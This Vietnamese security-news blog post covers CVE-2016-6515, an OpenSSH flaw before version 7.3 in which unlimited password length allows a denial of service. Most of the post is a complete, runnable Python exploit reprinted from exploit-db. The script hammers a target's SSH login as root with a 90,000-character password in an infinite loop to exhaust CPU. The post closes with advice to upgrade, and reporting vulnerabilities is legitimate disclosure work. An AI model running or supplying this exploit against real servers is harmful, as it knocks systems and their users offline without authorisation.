[SecurityNews] Lổ hổng bảo mật OpenSSH trước phiên bản 7.3 có thể tấn công DOS hệ thống

Vừa mới phát hiện lỗ hổng trên máy chủ OpenSSH(là một bộ miễn phí của công cụ kết nối hay còn gọi OpenBSD Secure Shell, cung cấp mã hóa bảo mật cho cả đăng nhập và truyền file từ xa giữa hai host trên một mạng) xử lý không chính xác băm mật khẩu trong khi chứng thực người dùng không tồn tại. Trong các phiên bản OpenSSH trước 7.3 không giới hạn độ dài của mật khẩu. Điều này cho phép kẻ tấn công từ xa để gây ra tấn công từ chối dịch vụ đối với hàm crypt của hệ thống thông qua sshd.

Lỗ hổng OpenSSH trước phiên bản 7.3 gây tấn công từ chối dịch vụ

PHƯƠNG THỨC THỰC HIỆN

Nếu máy tính từ xa được cài đặt và chạy phiên bản OpenSSH phiên bản trước 7.3 không giới hạn độ dài mật khẩu để xác thực thì có thể khai thác bằng cách gửi dữ liệu thủ công khoản 90000 ký tự đến trường ‘mật khẩu’ và cố gắng để đăng nhập vào một máy tính từ xa thông qua SSH với tên người dùng như ‘root’.

################################################################################
# Title     : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
# Author    : Kashinath T (tkashinath@secpod.com) (www.secpod.com)
# Vendor    : http://www.openssh.com/
# Software  : http://www.openssh.com/
# Version   : OpenSSH before 7.3
# Tested on : Ubuntu 16.04 LTS, Centos 7
# CVE       : CVE-2016-6515
# Date      : 20-10-2016
#
# NOTE:
# If the remote machine is installed and running OpenSSH version prior to 7.3,
# it does not limit the password length for authentication. Hence, to exploit
# this vulnerability' we will send a crafted data which is of 90000 characters
# in length to the 'password' field while attempting to log in to a remote
# machine via ssh with username as 'root'.
#
# For more info refer,
# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
################################################################################
 
import sys
from random import choice
from string import lowercase
 
try:
    import paramiko
except ImportError:
    print "[-] python module 'paramiko' is missing, Install paramiko with" \
          " following command 'sudo pip install paramiko'"
    sys.exit(0)
 
 
class ssh_exploit:
 
    def __init__(self):
        """
        Initialise the objects
        """
 
    def ssh_login(self, remote_ip):
 
        try:
            # Crafted password of length 90000
            passwd_len = 90000
            crafted_passwd = "".join(choice(lowercase)
                                     for i in range(passwd_len))
 
            # Connect to a remote machine via ssh
            ssh = paramiko.SSHClient()
            ssh.load_system_host_keys()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
            # calling connect in infinite loop
            print "[+] Entering infinite loop"
            while 1:
                ssh.connect(remote_ip, username='root',
                            password=crafted_passwd)
 
        except Exception, msg:
            print "Error in connecting to remote host : ", remote_ip
            print "Exception in : ssh_login method."
            sys.exit(msg)
 
 
def main():
 
    if len(sys.argv) != 2:
        print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
        sys.exit()
 
    # Calling ssh_connect
    ref_obj = ssh_exploit()
    ref_obj.ssh_login(sys.argv[1])
 
 
if __name__ == "__main__":
    main()

 
Nguồn: https://www.exploit-db.com/exploits/40888/

Nếu quá trình tấn công chạy một vòng lập vô hạn thì khiến tiêu thu tài nguyên CPU (100% CPU) từ đó dẫn đến hệ thống bị ảnh hưởng bị treo hoàn toàn. Để khắc phục lỗ hổng này cần nâng cấp phiên bản OpenSSH 7.3.

Theo :  vnhackernews

Previous article[Ebook] Lập trình mạng (2010, Tiếng Việt) – Lương Ánh Hoàng – Download PDF
Next article[Pentest] Tìm hiểu lổ hổng bảo mật OpenSSH (CVE-2016-6515)
Bạn đang theo dõi website "https://cuongquach.com/" nơi lưu trữ những kiến thức tổng hợp và chia sẻ cá nhân về Quản Trị Hệ Thống Dịch Vụ & Mạng, được xây dựng lại dưới nền tảng kinh nghiệm của bản thân mình, Quách Chí Cường. Hy vọng bạn sẽ thích nơi này !